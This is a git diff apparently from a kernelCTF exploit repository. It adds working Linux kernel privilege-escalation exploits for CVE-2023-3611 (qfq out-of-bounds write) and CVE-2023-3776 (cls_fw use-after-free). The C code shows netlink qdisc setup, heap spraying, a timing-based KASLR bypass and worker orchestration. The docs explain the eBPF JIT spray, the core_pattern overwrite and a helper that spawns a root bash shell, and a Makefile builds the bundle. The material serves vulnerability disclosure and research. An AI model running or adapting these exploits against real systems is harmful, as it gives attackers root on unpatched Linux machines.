+int create_tcfilter(int s, int ifindex, u32 parent, u16 prio) { + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTFILTER; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = 0; + + u16 protocol = 8; + data->tcm_info = ((u32)prio << 16) | (u32)protocol; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("rsvp") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "rsvp"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + int err = netlink_errno(s, nlh); + + // This sometimes shows EBUSY, but it still works? + // We just ignore the error, ... + if (err != -EBUSY && err != 0) { + E("failed to create tcfilter!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a netem qdisc with a large delay, used to slow down the enqueue / dequeue logic +int create_netem_qdisc(int s, int ifindex, u32 parent, u32 handle) { + struct nlmsghdr* nlh = calloc(2, 8192); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("netem") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "netem"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN + sizeof(struct tc_netem_qopt); + + struct tc_netem_qopt* netem_qopt = (void*)attr + NLA_HDRLEN; + netem_qopt->latency = 1000u * 1000 * 5000; // latency in us + // this limit is important: + // we want the first packet to be delayed indefinitely, but + // the second packet, which triggers the vuln, to be dropped. 
+ netem_qopt->limit = 1; + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create netem qdisc!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a qfq qdisc, main qdisc of interest +int create_qfq_qisc(int s, int ifindex, u32 parent, u32 handle) { + struct nlmsghdr* nlh = calloc(1, 8192); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("qfq") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "qfq"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + + + // Prepare the sizetable. This sizetable serves two purposes: + // - Trigger the vulnerability + // - Spray object in dyn-kmalloc-8192 with the fake qfq_group + // Essentially we setup a lookup table where the resulting + // packet size equals to (table[in_size >> 9] << 7) + // We choose those bitshifts to have some room for packet headers + // that we do not have to care about. + attr->nla_type = TCA_STAB; + attr->nla_len = NLA_HDRLEN; + + struct nlattr* nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_STAB_BASE; + nested->nla_len = NLA_HDRLEN + sizeof(struct tc_sizespec); + attr->nla_len += nested->nla_len; + + struct tc_sizespec* sizespec = (void*)nested + NLA_HDRLEN; + // see prep_stage1_large_payload where we setup the sizetable + // we use the logscaling in combination with the lookup table to prevent + //other packets from triggering the bug + sizespec->cell_log = 9; + sizespec->size_log = 7; + sizespec->cell_align = 0; + sizespec->overhead = 0; + sizespec->linklayer = 0; + sizespec->mpu = 0; + sizespec->mtu = 0; + sizespec->tsize = sizeof(struct stab_payload) / sizeof(u16); + + nested = (void*)nested + nested->nla_len; + nested->nla_type = TCA_STAB_DATA; + nested->nla_len = NLA_HDRLEN + sizespec->tsize * sizeof(u16); + attr->nla_len += nested->nla_len; + + fake_group.id++; + memcpy((void*)nested + NLA_HDRLEN, &fake_group, sizeof(fake_group)); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create qfq qdisc!"); + free(nlh); + return -1; + } + +free(nlh); +return 0; +} + +// Add a helper class to a qdisc +int create_helper_class(int s, int ifindex, u32 class_handle, u32 sub_qdisc_handle, u32 lmax) { + struct nlmsghdr* nlh = calloc(1, 4096); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTCLASS; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = class_handle; + + + struct nlattr* attr = 
NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + struct nlattr* nested; + + do { + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN; + + if (lmax) { + nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_QFQ_LMAX; + nested->nla_len = NLA_HDRLEN + sizeof(u32); + attr->nla_len += nested->nla_len; + *(u32*)((void*)nested + NLA_HDRLEN) = lmax; + } + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create helper class!"); + free(nlh); + return -1; + } + free(nlh); + + if (sub_qdisc_handle != 0) { + return create_netem_qdisc(s, ifindex, class_handle, sub_qdisc_handle); + } + + return 0; +} + +int spray_one_umem(void* buf) { + struct xdp_umem_reg mr = {0}; + // __u64 addr; /* Start of packet data area */ + // __u64 len; /* Length of packet data area */ + // __u32 chunk_size; + // __u32 headroom; + // __u32 flags; + + mr.addr = (u64)buf; + mr.chunk_size = 0x1000; + mr.len = 4 * 0x1000; // anything other than 8 is fine (the protocol we try to classify with the fake proto) + mr.headroom = 0; + mr.flags = 0; + + int s = socket(AF_XDP, SOCK_RAW, 0); + FAIL_IF(s < 0); + + FAIL_IF(setsockopt(s, SOL_XDP, XDP_UMEM_REG, &mr, sizeof(mr)) < 0); + return s; +} + +// Worker to spray qdiscs and potentially trigger the vulnerabilty. +// Each worker will have its own network namespace and create qdiscs +// for the loopback device. +// We could create virtual devices, but here we are. +int bug_worker(void* arg) { + int i = *(int*)arg; + + FAIL_IF(_pin_to_cpu(0) != 0); + + const u32 handle = 0x10000000 | (i << 16); + const u32 handle_oob = handle | (1 << 0); + const u32 handle_help = handle | (1 << 1); + const u32 handle_faked1 = handle | (1 << 2); + + const u32 sub_handle_help = 0x20010000; + const u32 sub_handle_oob = 0x20020000; + + const int loindex = if_nametoindex("lo"); + + int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + FAIL_IF(s < 0); + + struct sockaddr_nl addr = {0}; + addr.nl_family = AF_NETLINK; + + FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // Up the device and set the MTU to LMAX, which will trigger the vulnerability + // later on. + if (prepare_device(s, loindex) < 0) { + return -1; + } + + // Prepare qfq qdisc without anything else. + // Eventually we will create everything of interest when we pull the trigger. + // Until that this qdisc serves as some kind of "grooming" object. 
+ if (create_qfq_qisc(s, loindex, TC_H_ROOT, handle) < 0) { + return -1; + } + + #define NUM_SOCKETS2 4 + int payloads[NUM_SOCKETS2*2] = {0}; + + #define _WAIT_FOR_WAKEUP() { \ + while (wake != i) { \ + sleep(1); \ + if (done) { \ + return 0; \ + } \ + } \ + wake = 0; \ + } + + for (int i = 0; i < NUM_SOCKETS2*2; i++) { + if (payloads[i] > 0) { + close(payloads[i]); + payloads[i] = 0; + } + } + for (int i = 0; i < NUM_SOCKETS2; i++) { + payloads[i] = spray_one_umem(payload); + FAIL_IF(payloads[i] < 0); + } + FAIL_IF(create_tcfilter(s, loindex, handle, 0x1111) != 0); + for (int i = 0; i < NUM_SOCKETS2; i++) { + payloads[i + NUM_SOCKETS2] = spray_one_umem(payload); + FAIL_IF(payloads[i + NUM_SOCKETS2] < 0); + } + + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + + if (i == qdisc_trigger_bug) { + L("worker %d is entering stage 1b: trigger vulnerability", i); + + L("trying to prepare helper class .."); + // This is a real helper class: We use it to make the code below follow + // certain paths in sch_qfq.c + // We require the following: + // - qfq_sch->in_serv_agg != NULL + // - qfq_sch->in_serv_agg != OOB agg + // We use a netem qdisc with a large delay to consistently hit the window + // between qfq_enqueue -> qfq_dequeue where the in_serv_agg would be reset. + if (create_helper_class(s, loindex, handle_help, sub_handle_help, 0x1000) != 0) { + E("failed to create helper class :("); + return -1; + } + + L("trying to prepare oob class .."); + // Class which will carry the aggregate with the OOB group + // In order to hit the desired update code paths, this class needs + // packets in its (sub)qdisc. + if (create_helper_class(s, loindex, handle_oob, sub_handle_oob, 0x2000) != 0) { + E("failed to create oob class :("); + return -1; + } + + L("activating helper agg .."); + u8 buf[1 << 9] = {0}; + + int sc, ss; + struct sockaddr_in addr; + u32 addr_len; + + ss = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(ss < 0); + sc = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(sc < 0); + + addr.sin_family = AF_INET; + addr.sin_port = 0; + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + addr_len = sizeof(addr); + + FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0); + FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0) + + // set in_serv_agg = helper agg + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_help, sizeof(handle_help)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // make (not-yet) oob class active + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_oob, sizeof(handle_oob)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // trigger vulnerability + // note that this packet will be dropped by the child (netem) qdisc + FAIL_IF(sendto(sc, buf, 1 << 9, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + close(ss); + close(sc); + + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + return -1; + } + + { + // trigger payload + + int sc, ss; + struct sockaddr_in addr; + u32 addr_len; + ss = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(ss < 0); + sc = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(sc < 0); + + addr.sin_family = AF_INET; + addr.sin_port = 0; + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + addr_len = sizeof(addr); + + FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0); + FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0) + + // trigger, what we send does not matter + FAIL_IF(sendto(sc, &addr, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + maybe_win(); + + // 
payload failed .. + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + + return -1; + } +} + +int main(int argc, char* argv[]) { + // main orchestration routine. + + // Hopefully less noise due to thread creation + FAIL_IF(_pin_to_cpu(1) != 0); + + if (argc == 2) { + u64 base = strtoull(argv[1], NULL, 16); + L("using supplied kernel base: %llx", base); + u64 diff = base - 0xffffffff81000000ull; + L("diff: %llx", diff); + + #define __x(name) { name += diff; L("corrected %s to %p", #name, (void*)name); } + FOR_ALL_OFFSETS(__x); + #undef __x + } else { + FAIL_IF(get_kernel_base() < 0); + } + + payload = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(payload == MAP_FAILED); + prep_tcf_proto_payload(payload); + prep_stage1_large_payload(&fake_group); + + for (int try = 0; try < 10; try++) { + int worker_i = 1; + + L("spraying qdiscs .."); + for (worker_i = 1; worker_i <= ATTEMPT_LARGE_EVERY; worker_i++) { + FAIL_IF(spawn_worker(&bug_worker, &worker_i) < 0); + EVENT_WAIT(parent_notify); + } + + worker_i--; + qdisc_trigger_bug = 10; + + wake = qdisc_trigger_bug; + EVENT_WAIT(parent_notify); + + L("triggering payloads .."); + for (int i = 1; i <= worker_i; i++) { + if (i != qdisc_trigger_bug) { + wake = i; + EVENT_WAIT(parent_notify); + } + } + + E("attempt failed .("); + while (last_worker > 0) { + kill_worker(last_worker - 1); + } + sleep(1); + } + + E("we failed .("); + return 0; +} + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + + +void prefetch(void* p) +{ + asm volatile ("prefetchnta (%0)" : : "r" (p)); + asm volatile ("prefetcht2 (%0)" : : "r" (p)); +} + + +#define FLUSH_SIZE (4*1024*1024) +u8 __mem[FLUSH_SIZE]; + +inline void flush_cache() { + for (int i = 0; i < FLUSH_SIZE; i++) { + __mem[i] = i; + } +} + +size_t flushandreload(void* addr) // row miss +{ + flush_cache(); + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +int get_kernel_base() { + L("getting kernel base address .."); + + #define START 0xffffffff80000000ull + #define END 0xfffffffff0000000ull + #define STEP 0x0000000001000000ull + size_t times[(END - START) / STEP] = {0}; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = START + STEP * (u64)ti; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + leak_kernel_base = START + STEP * (u64)mini; + L("likely kernel base: %p (%zu)", (void*)leak_kernel_base, times[mini]); + + i64 diff = 0xffffffff81000000 - leak_kernel_base; + L("diff: %lld", diff); + + 
#define __x(name) { name -= diff; L("corrected %s to %p", #name, (void*)name); }
+    FOR_ALL_OFFSETS(__x);
+    #undef __x
+    return 0;
+}
diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/metadata.json
new file mode 100644
index 00000000..d1e757e1
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/metadata.json
@@ -0,0 +1,31 @@
+{
+    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
+    "submission_ids": ["exp55"],
+    "vulnerability": {
+        "summary": "qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.",
+        "cve": "CVE-2023-3611",
+        "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64",
+        "affected_versions": ["3.0.0 - 6.5.0"],
+        "requirements": {
+            "attack_surface": ["userns"],
+            "capabilities": ["CAP_NET_ADMIN"],
+            "kernel_config": [
+                "CONFIG_NET_SCH_QFQ"
+            ]
+        }
+    },
+    "exploits": {
+        "lts-6.1.35": {
+            "environment": "lts-6.1.35",
+            "uses": ["userns"],
+            "requires_separate_kaslr_leak": false,
+            "stability_notes": "30-50% success rate"
+        },
+        "mitigation-6.1": {
+            "environment": "mitigation-6.1",
+            "uses": ["userns"],
+            "requires_separate_kaslr_leak": true,
+            "stability_notes": "5% success rate"
+        }
+    }
+}
diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/original.tar.gz
new file mode 100644
index 00000000..68aed2a2
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/original.tar.gz differ
diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/exploit.md
new file mode 100644
index 00000000..c192f813
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/exploit.md
@@ -0,0 +1,230 @@
+### Triggering Vulnerability
+Using this vulnerability, we can drive the reference counter of a qdisc class to 0 and then free the qdisc class (by deleting it) while it is still attached to an active filter.
+When a packet is sent to the network, it is enqueued to the network scheduler. If the packet matches our filter, the classifier returns our freed qdisc class.
+The qdisc class object contains a qdisc object, which is used to enqueue packets to the respective network interface via a function pointer.
+
+The following snippet shows the relevant code when we use `drr_class` as the target object.
+
+```c++
+static int drr_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+		       struct sk_buff **to_free)
+{
+	unsigned int len = qdisc_pkt_len(skb);
+	struct drr_sched *q = qdisc_priv(sch);
+	struct drr_class *cl;
+	int err = 0;
+	bool first;
+
+	cl = drr_classify(skb, sch, &err); // [1]
+	...
+	err = qdisc_enqueue(skb, cl->qdisc, to_free);
+	...
+	return err;
+}
+
+static inline int qdisc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+				struct sk_buff **to_free)
+{
+	qdisc_calculate_pkt_len(skb, sch);
+	return sch->enqueue(skb, sch, to_free); // [2]
+}
+```
+
+At [1], drr_classify() returns the freed `drr_class`. The freed object is then used to fetch the qdisc object via `cl->qdisc`, which is passed to the `qdisc_enqueue` function. If we can control `cl->qdisc->enqueue`, we get RIP control at [2].
+
+### Target objects
+Our target object is `struct drr_class`, which resides in kmalloc-128.
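+
+To make the setup above concrete before moving on to the sprays, here is the trigger sequence as a minimal sketch, built from the same `tc` commands that are quoted in the PoC's comments. Shelling out to tc(8) is only for readability; the PoC itself replays pre-captured netlink payloads, and the interface and class identifiers below are simply the ones it uses.
+
+```c++
+#include <stdlib.h>
+
+/* Sketch of the UAF setup, mirroring the tc commands quoted in poc.c.
+ * The failing "replace" leaves the class refcount unbalanced, so the
+ * later class delete frees a drr_class the fw filter still points at. */
+int setup_uaf(void)
+{
+    if (system("ip link set lo up") ||
+        system("tc qdisc add dev lo root handle 1: drr") ||
+        system("tc class add dev lo parent 1: classid 1:10 drr quantum 60") ||
+        system("tc filter add dev lo parent 1: pref 100 protocol ip handle 1 fw classid 1:10"))
+        return -1;
+
+    /* indev "loo" does not exist, so tcf_change_indev() fails after
+     * tcf_bind_filter() has already adjusted the class refcount. */
+    system("tc filter replace dev lo pref 100 protocol ip handle 1 fw classid 1:20 indev loo");
+
+    /* Deleting the class now frees it while the filter still uses it. */
+    return system("tc class delete dev lo classid 1:10");
+}
+```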
+
+### Spray objects
+
+#### For LTS/COS instance
+
+Since there is no CONFIG_KMALLOC_SPLIT_VARSIZE, we can reclaim the freed `struct drr_class` allocation with a `ctl_buf`. We use sendmsg to spray ctl_buf with controlled data at line [3].
+
+```C
+static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys,
+			   unsigned int flags, struct used_address *used_address,
+			   unsigned int allowed_msghdr_flags)
+...
+	BUILD_BUG_ON(sizeof(struct cmsghdr) !=
+		     CMSG_ALIGN(sizeof(struct cmsghdr)));
+	if (ctl_len > sizeof(ctl)) {
+		ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
+		if (ctl_buf == NULL)
+			goto out;
+	}
+	err = -EFAULT;
+	if (copy_from_user(ctl_buf, msg_sys->msg_control_user, ctl_len)) //[3]
+		goto out_freectl;
+```
+
+#### For Mitigation instance
+Because CONFIG_KMALLOC_SPLIT_VARSIZE is enabled, we need to find a struct that is allocated from the fixed-size kmalloc-128 cache. `struct ctnetlink_filter` lives in the right cache, so we can spray it and place our payload there.
+
+```C
+static struct ctnetlink_filter *
+ctnetlink_alloc_filter(const struct nlattr * const cda[], u8 family)
+{
+	struct ctnetlink_filter *filter;
+	int err;
+...
+
+	filter = kzalloc(sizeof(*filter), GFP_KERNEL);
+...
+	err = ctnetlink_parse_zone(cda[CTA_ZONE], &filter->zone);
+	if (err < 0)
+		goto err_filter;
+
+	err = ctnetlink_parse_filter(cda[CTA_FILTER], filter);
+	if (err < 0)
+
+```
+
+### KASLR Bypass
+#### Spray eBPF programs
+Our goal is to do some eBPF JIT spraying, so that later, when we control the kernel RIP, execution lands in a JIT page and runs our shellcode.
+
+The Linux kernel provides the socket option `SO_ATTACH_FILTER`, which lets a user attach a classic BPF program to a socket as a filter for incoming packets.
+
+By creating lots of sockets and attaching a classic BPF program to each of them, we can spray many eBPF programs in the kernel:
+```cpp
+    struct sock_fprog prog = {
+        .len = TSIZE,
+        .filter = filter,
+    };
+    int fd[2];
+    for(int i=0;i<0x100;i++){
+        socketpair(AF_UNIX, SOCK_DGRAM, 0, fd);
+        setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog));
+    }
+```
+
+#### Guessing the JIT address
+The sprayed JIT pages land in the module mapping area, so we can pick an address that very likely falls inside one of our programs. Using the fixed cpu_entry_area mapping (CVE-2023-0597), we place controlled data at a known kernel address, point the freed class's `cl->qdisc` at that fixed kernel address that contains our controlled value, and then set the `enqueue` function pointer to the guessed eBPF JIT address. (The immediate-packing trick used by the sprayed programs is sketched below.)
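+
+For reference, this is how the shellcode bytes end up inside the `BPF_LD+BPF_K` immediates (this mirrors what `sc.py` generates into `sc.h`). It is a sketch that assumes the JIT lowers each such load to `mov eax, imm32` (`b8 xx xx xx xx`), so consecutive immediates sit 5 bytes apart in the JIT image: three bytes of each immediate are payload and the fourth is `0x3c` (`cmp al, imm8`), which consumes the `b8` opcode of the next load, so execution slides from one immediate into the next.
+
+```cpp
+#include <linux/filter.h>
+
+/* Sketch: pack raw shellcode (padded with 0x90 to a multiple of 3) into
+ * BPF_LD+BPF_K immediates, filling the filter backwards the way sc.h does. */
+static int pack_shellcode(struct sock_filter *filter, int idx,
+                          const unsigned char *sc, int len)
+{
+    for (int off = len - 3; off >= 0; off -= 3) {
+        unsigned int k = sc[off] | sc[off + 1] << 8 | sc[off + 2] << 16;
+        k |= 0x3cu << 24; /* cmp al, imm8: swallows the next mov's b8 byte */
+        filter[idx--] = (struct sock_filter){ .code = BPF_LD + BPF_K, .k = k };
+    }
+    return idx; /* next free slot, counting down */
+}
+```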
+
+### Post RIP
+
+Once we control the kernel RIP and jump into the middle of our eBPF program, the shellcode we crafted overwrites core_pattern with `|/proc/%P/fd/666`.
+
+We then use memfd to place an executable payload at fd 666:
+```C
+int check_core()
+{
+    // Check if /proc/sys/kernel/core_pattern has been overwritten
+    char buf[0x100] = {};
+    int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+    read(core, buf, sizeof(buf));
+    close(core);
+    return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+void crash(char *cmd)
+{
+    int memfd = memfd_create("", 0);
+    SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff));
+    dup2(memfd, 666);
+    close(memfd);
+    while (check_core() == 0)
+        sleep(1);
+    *(size_t *)0 = 0;
+}
+```
+
+Later, when a coredump happens, the kernel executes our file as root in the root namespace:
+```C
+*(size_t*)0=0; //trigger coredump
+```
+
+The executable `root` spawns a shell when the coredump happens. This is what the code looks like:
+```c++
+void* job(void* x){
+    FILE* fp = popen("pidof billy","r");
+    fread(buf,1,0x100,fp);
+    fclose(fp);
+    int pid = strtoull(buf,0,10);
+    int pfd = syscall(SYS_pidfd_open,pid,0);
+    int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+    int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+    int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+    dup2(stdinfd,0);
+    dup2(stdoutfd,1);
+    dup2(stderrfd,2);
+    execlp("bash","bash",NULL);
+
+}
+int main(int argc,char** argv){
+    job(0);
+}
+```
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/vulnerability.md
new file mode 100644
index 00000000..7133fb02
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/vulnerability.md
@@ -0,0 +1,12 @@
+- Requirements:
+ - Capabilities: CAP_NET_ADMIN
+ - Kernel configuration: CONFIG_NET_SCHED=y, CONFIG_NET_CLS_FW=y
+ - User namespaces required: Yes
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/sched/cls_fw.c?id=1da177e4c3f4
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=0323bce598eea038714f941ce2b22541c46d488f
+- Affected Version: v2.6.12-rc2 - v6.5-rc7
+- Affected Component: net/sched
+- Syscall to disable: disallow unprivileged user namespaces
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-3776
+- Cause: Use-After-Free
+- Description: A use-after-free vulnerability in the Linux kernel's net/sched: cls_fw component can be exploited to achieve local privilege escalation. If tcf_change_indev() fails, fw_set_parms() immediately returns an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and drive it to zero, the object is freed, leading to a use-after-free.
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/Makefile b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/Makefile
new file mode 100644
index 00000000..50edad6f
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/Makefile
@@ -0,0 +1,18 @@
+exploit: poc root run.sh
+	tar czf ./poc.tar.gz root poc POC ip0 ip1
+	cp run.sh exploit
+	fallocate -l 512 exploit
+	dd if=poc.tar.gz of=exploit conv=notrunc oflag=append
+
+poc: poc.c foo.o sc.h
+	gcc poc.c -o poc -static -no-pie -g foo.o -pthread
+root: root.c
+	gcc -static -o root root.c
+foo.o: foo.s
+	nasm -f elf64 foo.s
+sc.h: sc.py
+	python3 sc.py > sc.h
+
+clean:
+	rm -rf exploit poc foo.o sc.h root
+
diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/POC b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/POC
new file mode 100644
index 00000000..7ac6c636
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/POC differ
diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/exploit b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/exploit
new file mode 100644
index 00000000..fb2c9953
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.o b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.o
new file mode 100644
index 00000000..ba3ffecd
